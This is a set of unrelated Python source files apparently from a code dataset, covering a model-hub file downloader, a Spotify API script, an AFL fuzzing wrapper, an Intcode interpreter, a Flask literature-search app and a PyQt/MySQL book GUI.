temp_file_name)\n # for download with commit we can't get Sha256\n if file_to_download_info[FILE_HASH] is not None:\n file_integrity_validation(temp_file_path,\n file_to_download_info[FILE_HASH])\n return cache.put_file(file_to_download_info,\n os.path.join(temporary_cache_dir, temp_file_name))\n\n\ndef get_file_download_url(model_id: str, file_path: str, revision: str):\n \"\"\"\n Format file download url according to `model_id`, `revision` and `file_path`.\n e.g., Given `model_id=john/bert`, `revision=master`, `file_path=README.md`,\n the resulted download url is: https://modelscope.co/api/v1/models/john/bert/repo?Revision=master&FilePath=README.md\n \"\"\"\n download_url_template = '{endpoint}/api/v1/models/{model_id}/repo?Revision={revision}&FilePath={file_path}'\n return download_url_template.format(\n endpoint=get_endpoint(),\n model_id=model_id,\n revision=revision,\n file_path=file_path,\n )\n\n\ndef http_get_file(\n url: str,\n local_dir: str,\n file_name: str,\n cookies: CookieJar,\n headers: Optional[Dict[str, str]] = None,\n):\n \"\"\"\n Download remote file. Do not gobble up errors.\n This method is only used by snapshot_download, since the behavior is quite different with single file download\n TODO: consolidate with http_get_file() to avoild duplicate code\n\n Args:\n url(`str`):\n actual download url of the file\n local_dir(`str`):\n local directory where the downloaded file stores\n file_name(`str`):\n name of the file stored in `local_dir`\n cookies(`CookieJar`):\n cookies used to authentication the user, which is used for downloading private repos\n headers(`Optional[Dict[str, str]] = None`):\n http headers to carry necessary info when requesting the remote file\n\n \"\"\"\n total = -1\n temp_file_manager = partial(\n tempfile.NamedTemporaryFile, mode='wb', dir=local_dir, delete=False)\n\n with temp_file_manager() as temp_file:\n logger.info('downloading %s to %s', url, temp_file.name)\n headers = copy.deepcopy(headers)\n\n r = requests.get(url, stream=True, headers=headers, cookies=cookies)\n r.raise_for_status()\n\n content_length = r.headers.get('Content-Length')\n total = int(content_length) if content_length is not None else None\n\n progress = tqdm(\n unit='B',\n unit_scale=True,\n unit_divisor=1024,\n total=total,\n initial=0,\n desc='Downloading',\n )\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n progress.update(len(chunk))\n temp_file.write(chunk)\n progress.close()\n\n logger.info('storing %s in cache at %s', url, local_dir)\n downloaded_length = os.path.getsize(temp_file.name)\n if total != downloaded_length:\n os.remove(temp_file.name)\n msg = 'File %s download incomplete, content_length: %s but the \\\n file downloaded length: %s, please download again' % (\n file_name, total, downloaded_length)\n logger.error(msg)\n raise FileDownloadError(msg)\n os.replace(temp_file.name, os.path.join(local_dir, file_name))\n","sub_path":"ai/modelscope/modelscope/hub/file_download.py","file_name":"file_download.py","file_ext":"py","file_size_in_byte":9063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"589867394","text":"import os\nimport spotipy\nimport requests\nfrom dotenv import load_dotenv\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom spotipy.oauth2 import SpotifyOAuth\n\nscope = \"user-library-read\"\nuser_id = 1139419156\nplaylist_id = \"37i9dQZF1E8BKPvDxDZEtP\"\n\nload_dotenv() # take environment variables from .env.\n\nauth_manager = SpotifyClientCredentials()\n# sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\nsp = spotipy.Spotify(auth_manager=auth_manager)\n\nurl = f\"https://api.spotify.com/v1/users/{user_id}/playlists\"\nplaylistID = f\"https://api.spotify.com/v1/playlists/{playlist_id}/tracks\"\ntrackName = f\"\"\nprint(url)\n# url = \"\thttps://api.spotify.com/v1/me\"\n\npayload={}\nheaders = {\n 'Authorization': 'Bearer <>'\n}\n\nresponse = requests.request(\"GET\", playlistID, headers=headers, data=payload)\n\nprint(response.text)","sub_path":"spotty.py","file_name":"spotty.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"447598456","text":"\"\"\"\r\n\n\nIn chess, queens can move any number of squares horizontally, vertically or\ndiagonally.\n\nGiven the location of your queen and your opponents' queen, determine whether\nor not you're able to capture your opponent's queen. Your location and your\nopponents' location are the first and second elements of the list,\nrespectively.\n\n### Examples\n\n can_capture([\"A1\", \"H8\"]) ➞ True\n # Your queen can move diagonally to capture opponents' piece.\n \n can_capture([\"A1\", \"C2\"]) ➞ False\n # Your queen cannot reach C2 from A1 (although a knight could).\n \n can_capture([\"G3\", \"E5\"]) ➞ True\n\n### Notes\n\nAssume there are no blocking pieces.\n\n\"\"\"\r\n\ndef can_capture(queens):\n if queens[0][0] == queens[1][0] or queens[0][1] == queens[1][1]:\n return True\n else:\n ax = ord(queens[0][0])\n ay = ord(queens[0][1])\n ox = ord(queens[1][0])\n oy = ord(queens[1][1])\n if abs(ax-ox) == abs(ay-oy):\n return True\n else:\n return False\n\n","sub_path":"qjB3KLrK6JkmBkMZR_17.py","file_name":"qjB3KLrK6JkmBkMZR_17.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"257321948","text":"import numpy as np\nimport matplotlib.pyplot as plt\n''' ----------------------------------------------------------------- ***\n Integrate and fire |\n - Ohmic leakage current + voltage gated currents deactivated |\n at rest |\n CV' = I - gleak(V - Eleak) |\n if V == Ethresh: activation of volrage-sensitive |\n currents -> action potential, V <- Ek |\n References: |\n Izhikevich, E.M. (2007) |\n*** ----------------------------------------------------------------- '''\nclass passive_IF:\n C = 1.0 # capacitance\n V0 = -70 # reset V\n El = -60 # leak equilibrium potential\n Eth = -55 # spike treshold\n g = 0.001 # conductance\n \n V = 0.0 # membrane potential\n\n def simulate(self, I):\n Vs = np.zeros(len(I))\n spikes = []\n for n in range(len(I)):\n dV = (I[n] - self.g*(self.V - self.El)) / self.C\n V = self.V + dV\n if V >= self.Eth:\n V = self.V0\n spikes.append(n)\n self.V = V\n Vs[n] = V\n return Vs, spikes\n\n def __init__(self, V0=-70, El=-60, Eth=-55, g=0.001):\n self.V0 = V0\n self.El = El\n self.Eth = Eth\n self.g = g\n\n\n","sub_path":"IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"20009425","text":"import collections\n\n\ndef tail(secuencia, cantidad):\n #secuencia = list(secuencia)\n if cantidad > 0:\n d1 = collections.deque(maxlen=cantidad)\n for element in secuencia:\n d1.append(element)\n print(f\"element={element}\")\n '''\n print(f\"secuencia={secuencia}\")\n reversed_iterable = secuencia[::-1]\n print(f\"reversed= {reversed_iterable}\")\n reversed_sol = reversed_iterable[:cantidad]\n print(f\"reversed_sol= {reversed_sol}\")\n sol= reversed_sol[::-1]\n print(f\"sol= {sol}\")\n '''\n print(f\"d1={d1}\")\n return list(d1)\n\n else:\n return []","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181232540","text":"import argparse\nimport shlex\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport os\nfrom shutil import copyfile\n\n\ndef signal_term_handler(signal, frame):\n global aflfuzzerprocess\n global syncqueue\n if syncqueue:\n syncqueue.alive = False\n syncqueue._stop()\n print('got SIGTERM')\n print(aflfuzzerprocess)\n if aflfuzzerprocess:\n print(\"Killing fuzzer process\")\n aflfuzzerprocess.kill()\n sys.exit(0)\n\n\ndef get_afl_metadata(afl_dir_path) -> {}:\n fuzzer_stats_dict = {}\n try:\n # print(afl_dir_path+\"/fuzzer_stats\")\n with open(afl_dir_path + \"/fuzzer_stats\") as package_info_filepointer:\n text = package_info_filepointer.read()\n tmp_list = [item.strip().split(\":\", 1) for item in text.split(\"\\n\")]\n for item in tmp_list:\n # print(tmp_list)\n if len(item) == 2:\n fuzzer_stats_dict[item[0].strip()] = item[1].strip()\n # print(fuzzer_stats_dict)\n return fuzzer_stats_dict\n except FileNotFoundError:\n return None\n\n\nclass SyncQueue(threading.Thread):\n def __init__(self, fuzzer_dir: str, target_dir: str):\n threading.Thread.__init__(self)\n self.fuzzer_dir = fuzzer_dir\n self.queue_dir = os.path.join(self.fuzzer_dir, \"queue\")\n self.target_dir = target_dir\n if not os.path.exists(self.target_dir):\n os.makedirs(self.target_dir, exist_ok=True)\n self.alive = True\n\n def run(self):\n while self.alive:\n time.sleep(5) # sleep five seconds\n copy_to_dir = os.path.join(self.target_dir, \"queue\" + str(int(time.time())))\n os.mkdir(copy_to_dir)\n src_files = os.listdir(self.queue_dir)\n for file in src_files:\n if os.path.isfile(os.path.join(self.queue_dir, file)):\n copyfile(os.path.join(self.queue_dir, file), copy_to_dir + \"/\" + file)\n\n def _stop(self):\n self.alive = False\n\n\ndef main(invocation: str, queue_dir: str):\n global aflfuzzerprocess\n global SyncQueue\n output_argument_idx = shlex.split(invocation).index(\"-o\")\n afl_out_dir = shlex.split(invocation)[output_argument_idx + 1]\n print(\"out dir\", afl_out_dir)\n print(\"queue dir\", queue_dir)\n print(\"afl-fuzz \" + invocation)\n syncqueue = SyncQueue(afl_out_dir, queue_dir)\n syncqueue.start()\n import sh\n aflfuzz = sh.Command(\"afl-fuzz\")\n try:\n aflfuzzerprocess = subprocess.Popen(shlex.split(\"timeout 5m afl-fuzz \" + invocation), shell=False)\n aflfuzzerprocess.wait()\n except Exception as e:\n syncqueue.alive = False\n print(e)\n syncqueue.alive = False\n syncqueue._stop()\n\n\nif __name__ == \"__main__\":\n global aflfuzzerprocess\n global aflfuzzerprocess\n aflfuzzerprocess = None\n syncqueue = None\n parser = argparse.ArgumentParser(description='Evaluation helper script.')\n parser.add_argument(\"-i\", \"--invocation\", required=True, type=str, help=\"The invocation for the fuzzer.\",\n default=None)\n parser.add_argument(\"-q\", \"--qdir\", required=True, type=str, help=\"Where should the queue be stored?.\",\n default=None)\n args = parser.parse_args()\n try:\n main(args.invocation, args.qdir)\n except KeyboardInterrupt:\n print(\"Keyboard\")\n signal_term_handler(1, 1)\n","sub_path":"fexm/evalscripts/measure_coverage.py","file_name":"measure_coverage.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113332663","text":"# -*- coding:utf8 -*-\n\nu\"\"\"末端值标准化与解析\"\"\"\n\nimport re\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import ParseError\n\nfrom logbook import Logger\n\nfrom .topo import TermVal\nfrom .typeclass import StandardizedData\nfrom ..keypath import kp_push\n\n\nlogger = Logger(__name__)\n\n\n__all__ = ['StdTermVal', 'standardize_term_val']\n\n\ndef is_empty(v):\n return v == [] or v == {} or v == '' or v is None\n\n\nclass StdTermVal(TermVal):\n def __init__(self, value, namespace=None, key=None, original=None):\n super(StdTermVal, self).__init__(value)\n self.namespace = namespace\n self.key = key\n self.original = original or value\n\n @classmethod\n def standardize(cls, term):\n assert isinstance(term, TermVal)\n\n if isinstance(term, StdTermVal):\n return term\n\n v = term.value\n if isinstance(v, list):\n lst = v\n attrs_lst = [std_single_element(e) for e in lst]\n attrs = {\n 'value': [att['value'] for att in attrs_lst if not is_empty(att['value'])],\n 'namespace': {att['namespace'] for att in attrs_lst if att['namespace'] is not None},\n 'key': {att['key'] for att in attrs_lst if att['key'] is not None}\n }\n\n attrs['value'] = sorted(attrs['value']) # 去顺序化\n else:\n attrs = std_single_element(v)\n\n attrs['original'] = v\n return cls(**attrs)\n\n def is_empty(self):\n return is_empty(self.value)\n\n def __repr__(self):\n t = u'%s' % repr(self.value)\n if self.namespace:\n t += u', namespace=%s' % repr(self.namespace)\n if self.key:\n t += u', key=%s' % repr(self.key)\n return (u'StdTermVal(%s)' % t).encode('utf-8')\n\n def __eq__(self, other):\n if isinstance(other, StdTermVal):\n va, vb = self.value, other.value\n\n if isinstance(va, list) and isinstance(vb, list):\n if len(va) == len(vb):\n return all([self._element_eq(ea, eb) for ea, eb in zip(va, vb)])\n else:\n return False\n\n else:\n return self._element_eq(va, vb)\n\n return False\n\n @staticmethod\n def _element_eq(a, b):\n try:\n return a == b or float(a) == float(b)\n except (TypeError, ValueError):\n return False\n\n\ndef std_single_element(e):\n try:\n attrs = std_value_with_attrs(e)\n except (ParseError, TypeError):\n attrs = std_value_without_attrs(e)\n\n if isinstance(attrs['value'], (str, unicode)):\n is_fuzzy, fuzzy_info = parse_as_placeholder(attrs['value'])\n if is_fuzzy:\n attrs['value'] = fuzzy_info['naked']\n\n return attrs\n\n\ndef std_value_with_attrs(txt):\n u\"\"\"解析带有扩展信息的单值\"\"\"\n\n if isinstance(txt, unicode):\n txt = txt.encode('utf-8')\n\n node = ET.fromstring(txt)\n\n value = None\n namespace = None\n key = None\n\n sub_nodes = node.getchildren()\n for n in sub_nodes:\n if n.tag == 'value':\n value = n.text or ''\n\n if isinstance(value, str):\n value = value.decode('utf-8')\n\n elif n.tag == 'namespace':\n namespace = n.text\n elif n.tag == 'key':\n key = n.text\n\n assert value is not None, 'value tag must exist and not empty'\n\n if isinstance(value, (str, unicode)):\n value = std_string(value)\n\n return {\n 'value': value,\n 'namespace': namespace,\n 'key': key\n }\n\n\ndef std_value_without_attrs(o):\n u\"\"\"解释不带扩展信息的单值\"\"\"\n\n if isinstance(o, bool) or o is None:\n value = o\n\n else:\n if isinstance(o, (str, unicode)):\n value = o\n else:\n value = unicode(o)\n\n value = std_string(value)\n\n return {\n 'value': value,\n 'namespace': None,\n 'key': None\n }\n\n\ndef std_string(txt):\n\n # 统一使用 unicode,只有 bool 不动\n if isinstance(txt, unicode):\n uni = txt\n elif isinstance(txt, str):\n uni = txt.decode('utf-8')\n else:\n uni = unicode(txt)\n\n # 去掉空白\n o = re.sub(u'\\s+', u' ', uni.strip(u' \\t\\n'))\n\n # 全角转半角\n o = _str_q2b(o)\n\n # 标准化罗马数字\n o = _replace_luoma_char(o)\n\n return o\n\n\ndef parse_as_placeholder(txt):\n u\"\"\"按照占位符格式来解析文本\n\n 占位符格式为 \"__CIE_PLACEHOLDER__()/\"\n \"\"\"\n is_fuzzy = False\n placeholder = {\n 'issue': None,\n 'number': 0,\n 'naked': '',\n }\n\n if txt.startswith('__CIE_PLACEHOLDER__'):\n pre, issue = txt.split('/', 1)\n\n pre = pre[len('__CIE_PLACEHOLDER__('):]\n pre = pre[:-1]\n number = int(pre)\n\n placeholder = {\n 'issue': issue.strip(),\n 'number': number,\n 'naked': ''\n }\n\n is_fuzzy = True\n\n else:\n placeholder['naked'] = txt\n\n return is_fuzzy, placeholder\n\n\ndef _str_q2b(ustring):\n u\"\"\"全角转半角: “。” 不转, 特殊罗马字符等也不转\"\"\"\n rstring = u''\n for uchar in ustring:\n inside_code = ord(uchar)\n # 全角空格直接转换\n if inside_code == 12288:\n inside_code = 32\n # 全角字符(除空格)根据关系转化\n elif 65281 <= inside_code <= 65374:\n inside_code -= 65248\n\n rstring += unichr(inside_code)\n return rstring\n\n\ndef _replace_luoma_char(old_str):\n if len(old_str.rstrip()) == 0:\n return u\"\"\n old_str = old_str.replace(u\"Ⅰ\", u\"I\").replace(u\"Ⅱ\", u\"II\").replace(u\"Ⅲ\", u\"III\")\n old_str = old_str.replace(u\"Ⅳ\", u\"IV\").replace(u\"Ⅴ\", u\"V\").replace(u\"Ⅵ\", u\"VI\")\n old_str = old_str.replace(u\"Ⅶ\", u\"VII\").replace(u\"Ⅷ\", u\"VIII\").replace(u\"Ⅸ\", u\"IX\")\n old_str = old_str.replace(u\"Ⅹ\", u\"X\").replace(u\"Ⅺ\", u\"XI\").replace(u\"Ⅻ\", u\"XII\")\n\n return old_str\n\n\ndef standardize_term_val(std):\n u\"\"\"给标准嵌套结构数据,把所有的末端值标准化,再删掉无意义的空末端值\"\"\"\n assert isinstance(std, StandardizedData)\n return StandardizedData(_standardize_term_val(std.data, ''))\n\n\ndef _standardize_term_val(o, keypath):\n if isinstance(o, TermVal):\n try:\n term = StdTermVal.standardize(o)\n except Exception:\n logger.error('ValueStandardizeError: @{} value standardization failed {}', keypath, o)\n return None\n else:\n if not term.is_empty():\n return term\n\n elif isinstance(o, list):\n lst = []\n for e in o:\n v = _standardize_term_val(e, keypath)\n if not is_empty(v):\n lst.append(v)\n return lst\n\n elif isinstance(o, dict):\n dct = {}\n for k, v in o.iteritems():\n v = _standardize_term_val(v, kp_push(keypath, k))\n if not is_empty(v):\n dct[k] = v\n return dct\n","sub_path":"cie_eval/standardize/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"195819610","text":"def get_opcode(file_name):\n\twith open(file_name, \"r\") as input_file:\n\t\tinput_string = input_file.read()\n\t\treturn list(map(int, input_string.split(\",\")))\n\nclass Opcode:\n\t# int list: opcode\n\t# int: i\n\t# int: offset\n\t# list: input_queue\n\t# gen: gen\n\t\n\tdef __init__(self, file_name, input_queue = []):\n\t\tself.opcode = get_opcode(file_name)\n\t\tself.inputs = input_queue\n\t\tself.i = 0\n\t\tself.offset = 0\n\t\tself.gen = self.opcode_generator()\n\t\n\tdef set_element(self, position, element):\n\t\twhile len(self.opcode) < position + 1:\n\t\t\tself.opcode.append(0)\n\t\tself.opcode[position] = element\n\t\n\tdef get_element(self, position):\n\t\tif position > len(self.opcode) - 1:\n\t\t\treturn 0\n\t\treturn self.opcode[position]\n\t\n\tdef get_position(self, operation, position):\n\t\tparameter_mode = int(operation[-2 - position])\n\t\tparameter_value = self.get_element(self.i + position)\n\n\t\t# write\n\t\tif position == 3 or (position == 1 and operation[3:5] in [\"03\"]):\n\t\t\tif parameter_mode == 0 or parameter_mode == 1:\n\t\t\t\treturn parameter_value\n\t\t\tif parameter_mode == 2:\n\t\t\t\treturn parameter_value + self.offset\n\t\t# read\n\t\tif parameter_mode == 0:\n\t\t\treturn self.get_element(parameter_value)\n\t\tif parameter_mode == 1:\n\t\t\treturn parameter_value\n\t\tif parameter_mode == 2:\n\t\t\treturn self.get_element(parameter_value + self.offset)\n\t\t\n\tdef opcode_generator(self):\n\t\twhile True:\n\t\t\toperation = str(self.get_element(self.i)).rjust(5, '0')\n\t\t\tinstruction = operation[3:5]\n\t\n\t\t\t# end\n\t\t\tif instruction == \"99\":\n\t\t\t\tbreak\n\t\n\t\t\tpos1 = self.get_position(operation, 1)\n\t\t\t\n\t\t\tif instruction not in [\"03\", \"04\", \"09\"]:\n\t\t\t\tpos2 = self.get_position(operation, 2)\n\t\t\t\n\t\t\t\tif instruction not in [\"05\", \"06\"]:\n\t\t\t\t\tpos3 = self.get_position(operation, 3)\n\t\n\t\t\t# add\n\t\t\tif instruction == \"01\":\n\t\t\t\tself.set_element(pos3, pos1 + pos2)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# mult\n\t\t\telif instruction == \"02\":\n\t\t\t\tself.set_element(pos3, pos1 * pos2)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# input\n\t\t\telif instruction == \"03\":\n\t\t\t\tyield -2\n\t\t\t\tif len(self.inputs) > 0:\n\t\t\t\t\tself.set_element(pos1, self.inputs.pop(0))\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos1, int(input(\"input: \")))\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 2\n\t\n\t\t\t# output\n\t\t\telif instruction == \"04\":\n\t\t\t\tyield pos1\n\t\t\t\tself.i += 2\n\t\n\t\t\t# jump if !0\n\t\t\telif instruction == \"05\":\n\t\t\t\tif pos1 != 0:\n\t\t\t\t\tself.i = pos2\n\t\t\t\telse:\n\t\t\t\t\tself.i += 3\n\t\n\t\t\t# jump if 0\n\t\t\telif instruction == \"06\":\n\t\t\t\tif pos1 == 0:\n\t\t\t\t\tself.i = pos2\n\t\t\t\telse:\n\t\t\t\t\tself.i += 3\n\t\n\t\t\t# less than\n\t\t\telif instruction == \"07\":\n\t\t\t\tif pos1 < pos2:\n\t\t\t\t\tself.set_element(pos3, 1)\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos3, 0)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\n\t\t\t# equals\n\t\t\telif instruction == \"08\":\n\t\t\t\tif pos1 == pos2:\n\t\t\t\t\tself.set_element(pos3, 1)\n\t\t\t\telse:\n\t\t\t\t\tself.set_element(pos3, 0)\n\t\n\t\t\t\tif str(self.get_element(self.i)).rjust(5, '0') == operation:\n\t\t\t\t\tself.i += 4\n\t\t\t\n\t\t\t# offset adjustment\n\t\t\telif instruction == \"09\":\n\t\t\t\tself.offset += pos1\n\t\n\t\t\t\tself.i += 2\n\t\t\t\n\t\t\t# oopsie\n\t\t\telse:\n\t\t\t\tprint(self)\n\t\t\t\tbreak\n\t\twhile True:\n\t\t\tyield None\n\t\n\tdef get_next(self):\n\t\treturn next(self.gen)\n\nif __name__ == \"__main__\":\n\topc = Opcode(\"day11_input.txt\", [0])\n\toutput = opc.get_next()\n\twhile output != None:\n\t\tprint(output)\n\t\toutput = opc.get_next()","sub_path":"solutions/aoc_opcode.py","file_name":"aoc_opcode.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528573158","text":"import datetime\nimport shutil\nfrom flask import Flask, render_template, request, send_from_directory\nfrom invisibleroads_macros import disk, security\nfrom os.path import basename, join\nfrom tempfile import mkdtemp\nfrom run import parse_date\nfrom run import run as run_script\nfrom run import res as res_script\nfrom run import author as author_script\nfrom run import parse_list\n\n\napp = Flask(__name__)\nresults_folder = disk.make_folder('results')\nspecialties = {}\nwith open('specialties.txt', 'r') as f:\n for line in f:\n line = line.split('=')\n if 'Pick a' in line[1]:\n continue\n line[1] = line[1].replace('\\n', '')\n specialties[line[1]] = line[0]\n\n@app.route('/')\ndef index():\n #TODO: Dynamically add journals\n return render_template('index.html')\n\n\n@app.route('/res', methods=['POST'])\ndef res():\n target_folder = mkdtemp()\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n specialty = request.form.get('specialty')\n if not specialty:\n specialty = None\n spec_value = None\n else:\n spec_value = specialties[specialty]\n \n parse_list(author_names)\n if not author_names:\n err = 'Error: no Author names'\n return render_template('response.html', error = err)\n search_names = author_names[:]\n for i,name in enumerate(search_names):\n name = name.split(' ')\n name = ' '.join([name[0], name[(len(name)-1)]])\n search_names[i] = name\n\n result_properties = res_script(target_folder, search_names, specialty, spec_value)\n\n if 'Error' in result_properties:\n return render_template( 'response.html', error=result_properties)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n result_properties=zip(\n author_names,\n result_properties['residencies'],\n result_properties['med_schools']))\n\n\n@app.route('/author', methods=['POST'])\ndef author():\n target_folder = mkdtemp()\n\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n try:\n from_date = parse_date(request.form.get('from_date'))\n to_date = parse_date(request.form.get('to_date'))\n except (TypeError, ValueError):\n from_date, to_date = None, None\n\n parse_list(author_names)\n if not author_names:\n err = 'Error: no Author names'\n return render_template('response.html', error = err)\n search_names = author_names[:]\n for i,name in enumerate(search_names):\n name = name.split(' ')\n name = ' '.join([name[0], name[(len(name)-1)]])\n search_names[i] = name\n \n \n result_properties = author_script(target_folder, search_names, from_date, to_date)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n result_properties=zip(\n result_properties['author_names'],\n result_properties['article_counts']))\n\n\n@app.route('/run', methods=['POST'])\ndef run():\n target_folder = mkdtemp()\n journal_names = sorted(set(\n request.form.get('journal_names', '').splitlines()))\n author_names = sorted(set(\n request.form.get('author_names', '').splitlines()))\n text_terms = sorted(set(\n request.form.get('text_terms', '').splitlines()))\n mesh_terms = sorted(set(\n request.form.get('mesh_terms', '').splitlines()))\n custom_expression = request.form.get('custom_expression', '')\n lists = [journal_names, author_names, text_terms, mesh_terms]\n for l in lists:\n parse_list(l)\n if not journal_names:\n err = 'Error: no Journal names'\n return render_template('response.html', error = err) \n try:\n from_date = parse_date(request.form.get('from_date'))\n to_date = parse_date(request.form.get('to_date'))\n except (TypeError, ValueError):\n from_date, to_date = None, None\n date_interval_in_years = request.form.get('date_interval_in_years')\n if date_interval_in_years:\n date_interval_in_years = int(date_interval_in_years)\n\n result_properties = run_script(\n target_folder, journal_names, text_terms, mesh_terms,\n custom_expression, author_names, from_date,\n to_date, date_interval_in_years)\n\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%M%H')\n archive_nickname = '%s-%s' % (\n timestamp, security.make_random_string(16))\n archive_path = join(results_folder, archive_nickname + '.zip')\n disk.compress(target_folder, archive_path)\n\n\n source_image_path = join(\n target_folder, result_properties['image_name'])\n target_image_path = join(results_folder, archive_nickname + '.png')\n shutil.copy(source_image_path, target_image_path)\n return render_template(\n 'response.html',\n archive_name=basename(archive_path),\n image_name=basename(target_image_path),\n result_properties=result_properties)\n \n\n@app.route('/download/')\ndef download(file_name):\n file_path = join(results_folder, basename(file_name))\n return send_from_directory('.', filename=file_path)\n\n\n@app.errorhandler(404)\ndef not_found(error):\n error = '404 Error'\n return render_template('index.html', error=error), 404\n\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0',port=27973)\n app.run(port=27973, debug=True)\n","sub_path":"serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221039527","text":"from multiprocessing import Pool\nimport param_spread_alpha_beta\nimport sys\nimport os\n\ndef xfrange(start, stop, step):\n\twhile start < stop:\n\t\tyield start\n\t\tstart += step\n\t\t\ndef sysCall(alpha,beta,sim_run):\n\tos.system('python synthetic_diffusion.py '+str(alpha)+' '+str(beta)+' '+str(sim_run))\n\t\nif __name__ == '__main__':\n\ta1 = 0.1\n\ta2 = 2\n\tstep_a = 0.1\n\tb1 = 1\n\tb2 = 16\n\tstep_b = 1\n\tsim_run = sys.argv[1]\n\tpool = Pool(processes=5) \n\tfor alpha in xfrange(a1,a2,step_a):\n\t\tfor beta in xfrange(b1,b2,step_b):\n\t\t\tpool.apply_async(sysCall, args=(alpha,beta,sim_run))\n\tpool.close()\n\tpool.join()\n\t\t\t\t\t\t","sub_path":"synthetic_topic_diffusion/param_spread_grid_search.py","file_name":"param_spread_grid_search.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319052674","text":"from PyQt5.QtWidgets import *\r\nimport pymysql\r\nimport sys\r\n\r\ndef conectaBanco():\r\n global con\r\n con = pymysql.connect(host='localhost',user='root',database='db_MeusLivros',cursorclass=pymysql.cursors.DictCursor,password='abc123**')\r\n\r\ndef msgProblemaBD():\r\n msgProblema = QMessageBox()\r\n msgProblema.setWindowTitle('Problema')\r\n msgProblema.setText('Problema ao obter os dados. Tente novamente.')\r\n msgProblema.exec()\r\n\r\ndef msgSucesso():\r\n msgSucesso = QMessageBox()\r\n msgSucesso.setWindowTitle('Sucesso!')\r\n msgSucesso.setText('Registro inserido com sucesso!')\r\n msgSucesso.exec()\r\n\r\nclass Janela(QMainWindow):\r\n ''' Classe principal '''\r\n def __init__(self): # método construtor da classe\r\n super().__init__()\r\n\r\n self.topo = 200\r\n self.esq = 200\r\n self.alt = 500\r\n self.lar = 800\r\n self.titulo = 'Acesso a banco de dados - I'\r\n\r\n # Criar botão para consulta de editora\r\n self.btnConsulta = QPushButton('Consultar Livro', self)\r\n self.btnConsulta.move(150, 50)\r\n self.btnConsulta.setStyleSheet('background-color:#0000EE;color:red;font:bold')\r\n self.btnConsulta.setToolTip('Clique aqui para consultar o livro')\r\n self.btnConsulta.clicked.connect(self.consultaLivro)\r\n\r\n # Caixas de texto para consulta de livro:\r\n self.lblLivro = QLabel(self)\r\n self.lblLivro.move(200,80)\r\n self.lblLivro.resize(250,30)\r\n self.lblLivro.setText('Digite o código do livro a pesquisar:')\r\n self.txtIdLivro = QLineEdit(self)\r\n self.txtNomeLivro = QLineEdit(self)\r\n self.txtIdLivro.move(200,105)\r\n self.txtIdLivro.resize(250,30)\r\n self.txtNomeLivro.move(200,150)\r\n self.txtNomeLivro.resize(250,30)\r\n\r\n # Combobox para exibir resultado da consulta de editoras\r\n self.lblEditora = QLabel(self)\r\n self.lblEditora.move(500, 50)\r\n self.lblEditora.resize(350, 20)\r\n self.lblEditora.setText('Editoras:')\r\n self.cmbEditoras = QComboBox(self)\r\n self.cmbEditoras.move(500,75)\r\n self.consultaEditoras()\r\n self.cmbEditoras.addItems(self.listaEditoras)\r\n self.cmbEditoras.activated.connect(self.informaEditora)\r\n\r\n # Caixa de texto para mostrar item selecionado no ComboBox\r\n self.txtEditora = QLineEdit(self)\r\n self.txtEditora.move(500,110)\r\n self.txtEditora.resize(200,20) \r\n\r\n # Caixa de Listagem\r\n self.listaEd = QListWidget(self)\r\n self.listaEd.addItems(self.listaEditoras)\r\n self.listaEd.move(300,250)\r\n self.listaEd.resize(150,100)\r\n self.listaEd.addItem('Bóson Books')\r\n self.listaEd.sortItems() # 